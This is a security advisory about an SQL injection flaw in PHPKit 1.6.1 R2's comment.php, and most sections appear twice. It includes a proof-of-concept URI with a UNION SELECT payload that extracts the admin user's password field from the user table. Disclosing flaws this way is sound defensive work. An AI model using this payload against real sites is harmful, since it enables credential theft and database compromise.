PHPKit Comment.PHP SQL Injection Vulnerability
BID:21962
Info
PHPKit Comment.PHP SQL Injection Vulnerability
| Bugtraq ID: | 21962 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 09 2007 12:00AM |
| Updated: | Jan 10 2007 05:21PM |
| Credit: | yorn is credited with the discovery of this vulnerability. |
| Vulnerable: |
PHPKIT PHPKIT 1.6.1 R2 |
| Not Vulnerable: | |
Discussion
PHPKit Comment.PHP SQL Injection Vulnerability
PHPKIT is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
PHPKIT 1.6.1 R2 and prior versions are vulnerable to this issue.
PHPKIT is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
PHPKIT 1.6.1 R2 and prior versions are vulnerable to this issue.
Exploit / POC
PHPKit Comment.PHP SQL Injection Vulnerability
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/comment.php&comcat=gb&subid=-1'%20UNION%20SELECT%201,1,1,1,1,1,user_pw,1%20from%20PHPKIT_USER_TABLE%20where%20%20user_id=1/*
Attackers can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/comment.php&comcat=gb&subid=-1'%20UNION%20SELECT%201,1,1,1,1,1,user_pw,1%20from%20PHPKIT_USER_TABLE%20where%20%20user_id=1/*
Solution / Fix
PHPKit Comment.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
PHPKit Comment.PHP SQL Injection Vulnerability
References:
References: